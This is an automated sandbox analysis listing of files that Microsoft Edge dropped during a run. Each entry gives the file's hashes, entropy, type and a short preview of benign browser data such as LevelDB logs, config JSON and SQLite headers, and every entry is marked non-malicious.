                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.14.%.q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13376620174923987..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):311
                                                                                                                                                                                                                                                        Entropy (8bit):5.186509986302719
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHcNYD1923oH+Tcwtk2WwnvB2KLlVHctSM+q2P923oH+Tcwtk2WwnvIFUv:nrmYebkxwnvFL/9M+v4YebkxwnQFUv
                                                                                                                                                                                                                                                        MD5:1D1BCB5BEB1EDAF1228795FD48414403
                                                                                                                                                                                                                                                        SHA1:05201B1C78A618DF7B7EC051BF472D2ED4B9600B
                                                                                                                                                                                                                                                        SHA-256:E1007FAE8616BAB4508420D98867FAD02FBE91F51B432EE596AE278D585F0C66
                                                                                                                                                                                                                                                        SHA-512:103762FDFACE93FFB768CCBB5A95C23497A3DF7AAEDC178E1A5FAB975203E0913360D88B8A1129C7C0D6587A52701066B8EBF692536A371C4C43B0DD6C143846
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:31.969 206c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/20-18:49:31.995 206c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):358860
                                                                                                                                                                                                                                                        Entropy (8bit):5.324624869679189
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rr:C1gAg1zfvD
                                                                                                                                                                                                                                                        MD5:0BCEA94479ACB5AB32BD86813221F9D4
                                                                                                                                                                                                                                                        SHA1:73AB785D107B4154CE921717A87B949413198CBD
                                                                                                                                                                                                                                                        SHA-256:7286004FBF39B1B41FEA28E0BEE20E44D80C1877F148CBD7E3FBFBA49D1E79B4
                                                                                                                                                                                                                                                        SHA-512:BEB196C890EAD3B023F74B4BBD6D29187AD0326BC989C42F8BED64AE7FD259FE7B0813002941435023DB294926AA16F05E926963E1FC8FCD13881D006A75C011
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.18841926952068
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHgVq2P923oH+Tcwt8aPrqIFUt8YHCMVgZmw+YHCMVIkwO923oH+Tcwt8amLJ:nYv4YebL3FUt8kCMS/+kCMe5LYebQJ
                                                                                                                                                                                                                                                        MD5:1DEDD74B840FB20AAE56475160EF7D32
                                                                                                                                                                                                                                                        SHA1:789CC9747D353DC0A0A4B1A0CFFFFC7E24D89642
                                                                                                                                                                                                                                                        SHA-256:427D7828F1057F3F5F4F14C8D0137AA2559CAD05398EFB9C4739175CAEA4871B
                                                                                                                                                                                                                                                        SHA-512:58506FE9E986E6496BF2F429460565FBBC3314042BB611CFAA971D9FC85F09F7DB50E134FE11B9401ECC17ED678CD80968FDA6397DC673D5CDA8FCE592B50074
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.255 1030 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/20-18:49:27.256 1030 Recovering log #3.2024/11/20-18:49:27.256 1030 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.18841926952068
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHgVq2P923oH+Tcwt8aPrqIFUt8YHCMVgZmw+YHCMVIkwO923oH+Tcwt8amLJ:nYv4YebL3FUt8kCMS/+kCMe5LYebQJ
                                                                                                                                                                                                                                                        MD5:1DEDD74B840FB20AAE56475160EF7D32
                                                                                                                                                                                                                                                        SHA1:789CC9747D353DC0A0A4B1A0CFFFFC7E24D89642
                                                                                                                                                                                                                                                        SHA-256:427D7828F1057F3F5F4F14C8D0137AA2559CAD05398EFB9C4739175CAEA4871B
                                                                                                                                                                                                                                                        SHA-512:58506FE9E986E6496BF2F429460565FBBC3314042BB611CFAA971D9FC85F09F7DB50E134FE11B9401ECC17ED678CD80968FDA6397DC673D5CDA8FCE592B50074
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.255 1030 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/20-18:49:27.256 1030 Recovering log #3.2024/11/20-18:49:27.256 1030 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):5.20593271179329
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHTdSQ+q2P923oH+Tcwt865IFUt8YH3gZmw+YH3QVkwO923oH+Tcwt86+ULJ:nROv4Yeb/WFUt8kQ/+kY5LYeb/+SJ
                                                                                                                                                                                                                                                        MD5:A7C8D3851B4A032497E4436843BA5318
                                                                                                                                                                                                                                                        SHA1:3DEB50E6C5879CF81847EB920E1C6BCE461E2515
                                                                                                                                                                                                                                                        SHA-256:092ADE1DE083DBB81906C84A4EC9FBB381C1896D5E23722E8D0BE1B0E18D03D4
                                                                                                                                                                                                                                                        SHA-512:AD81D30298DFD5650111B027423B1917F91A3D670D1922D576E8CAA0B4178A2D81BA4030F1AA36475C74FAED1F6A8D43425158B7E30CE92D361F718B46CC57FD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.276 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/20-18:49:27.279 1df8 Recovering log #3.2024/11/20-18:49:27.279 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):5.20593271179329
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHTdSQ+q2P923oH+Tcwt865IFUt8YH3gZmw+YH3QVkwO923oH+Tcwt86+ULJ:nROv4Yeb/WFUt8kQ/+kY5LYeb/+SJ
                                                                                                                                                                                                                                                        MD5:A7C8D3851B4A032497E4436843BA5318
                                                                                                                                                                                                                                                        SHA1:3DEB50E6C5879CF81847EB920E1C6BCE461E2515
                                                                                                                                                                                                                                                        SHA-256:092ADE1DE083DBB81906C84A4EC9FBB381C1896D5E23722E8D0BE1B0E18D03D4
                                                                                                                                                                                                                                                        SHA-512:AD81D30298DFD5650111B027423B1917F91A3D670D1922D576E8CAA0B4178A2D81BA4030F1AA36475C74FAED1F6A8D43425158B7E30CE92D361F718B46CC57FD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:27.276 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/20-18:49:27.279 1df8 Recovering log #3.2024/11/20-18:49:27.279 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1254
                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.123423153986325
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHcKTyq2P923oH+Tcwt8NIFUt8YHcKF1Zmw+YHcKTRkwO923oH+Tcwt8+eLJ:nvyv4YebpFUt8kz/+kvR5LYebqJ
                                                                                                                                                                                                                                                        MD5:9355CC53B9EA20DD0E78403CCC50BA10
                                                                                                                                                                                                                                                        SHA1:A368A40566F208D8BFDA4B01E9DFA6E0F1485DE3
                                                                                                                                                                                                                                                        SHA-256:ACA2DCA62B7C9C5EA6544596EA25DE9F2DC8DE3A23699BDEE0ADE1998D1AFE87
                                                                                                                                                                                                                                                        SHA-512:495F1DEAC95FA965BF1A6898725295972E53955C83C9B2610FC8C54C6C1B24ED3D8F22B420E66C758A95CE6A3544DAABC73AE8C6A947122EDAD24F9DA6ED5483
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:28.094 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/20-18:49:28.094 1de4 Recovering log #3.2024/11/20-18:49:28.094 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                                                                        Entropy (8bit):5.123423153986325
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:HHcKTyq2P923oH+Tcwt8NIFUt8YHcKF1Zmw+YHcKTRkwO923oH+Tcwt8+eLJ:nvyv4YebpFUt8kz/+kvR5LYebqJ
                                                                                                                                                                                                                                                        MD5:9355CC53B9EA20DD0E78403CCC50BA10
                                                                                                                                                                                                                                                        SHA1:A368A40566F208D8BFDA4B01E9DFA6E0F1485DE3
                                                                                                                                                                                                                                                        SHA-256:ACA2DCA62B7C9C5EA6544596EA25DE9F2DC8DE3A23699BDEE0ADE1998D1AFE87
                                                                                                                                                                                                                                                        SHA-512:495F1DEAC95FA965BF1A6898725295972E53955C83C9B2610FC8C54C6C1B24ED3D8F22B420E66C758A95CE6A3544DAABC73AE8C6A947122EDAD24F9DA6ED5483
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:28.094 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/20-18:49:28.094 1de4 Recovering log #3.2024/11/20-18:49:28.094 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                                                                        Entropy (8bit):0.21764117020334758
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:BllZllntFlljq7A/mhWJFuQ3yy7IOWUDol/dweytllrE9SFcTp4AGbNCV9RUIm:BllZk75fOVol/d0Xi99pEYA
                                                                                                                                                                                                                                                        MD5:BF3B2D87AD8BB4E7EF55788FFA001A12
                                                                                                                                                                                                                                                        SHA1:BB7C835ECD8B36FFD2E6BDF1D008F0371421B28A
                                                                                                                                                                                                                                                        SHA-256:180A450741540C567478EF4FB1A87BC47CA90891066B4B5C8F4CC1122C988D5C
                                                                                                                                                                                                                                                        SHA-512:2E60E6F0149A179DE3858B4FE8CF40CCBE1FD07ED10800D39A01199F2A4F77DA686F7546FBD674DD30AA58D32A82ADC33F1B634FEE72681B875C0476F53E4F0B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:...................&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                        Entropy (8bit):3.6476395605683054
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:aj9P0bP/KbtGgam6Ijjl2cg773pLChfQkQerIRKToaAu:adIP/SXl5g74Je2IRKcC
                                                                                                                                                                                                                                                        MD5:29CEC0932A52BF89F993D7B942613C2F
                                                                                                                                                                                                                                                        SHA1:9404502F37893816C3B4A9423099C39A4EF711BE
                                                                                                                                                                                                                                                        SHA-256:9A7423F478DA41F85B9FA51186DE052787DC037645C3F93ACBE3F16ED475DF55
                                                                                                                                                                                                                                                        SHA-512:FA4C1DBAB013BC372FBEF81F5A1CDC187668860CF8D07D5F9F2C1878057DEC87A9135D5F04A8404A163E03F4C4A1D8BE81997D487E1DD21B9BD57DD65F6BF6C3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):408
                                                                                                                                                                                                                                                        Entropy (8bit):5.26763658500183
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:nRyv4Yeb8rcHEZrELFUt8kGX/+kGjR5LYeb8rcHEZrEZSJ:n+4Yeb8nZrExg8kG3GXLYeb8nZrEZe
                                                                                                                                                                                                                                                        MD5:0BA888DD8691B08ACEB852623793C0E6
                                                                                                                                                                                                                                                        SHA1:7A607BA1AF7588C5A1D480A7C7A31FF2F5616800
                                                                                                                                                                                                                                                        SHA-256:4E3596C6C8CE62FCC5FB10059E4283052531CDBA40E71EBE611C7FA9735A43AF
                                                                                                                                                                                                                                                        SHA-512:81CF85BADDB983ECE0BE80210C8305FFFC06E6C2B6E93CE0CC45DFC1524702B24C9ECF8A66F3749DA761244EAB1B01096911F5477E8F6ECF021ECCB11F626C68
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:2024/11/20-18:49:31.076 1de4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/20-18:49:31.077 1de4 Recovering log #3.2024/11/20-18:49:31.077 1de4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):408
                                                                                                                                                                                                                                                        Entropy (8bit):5.26763658500183
                                                                                                                                                                                                                                                        Encrypted:false
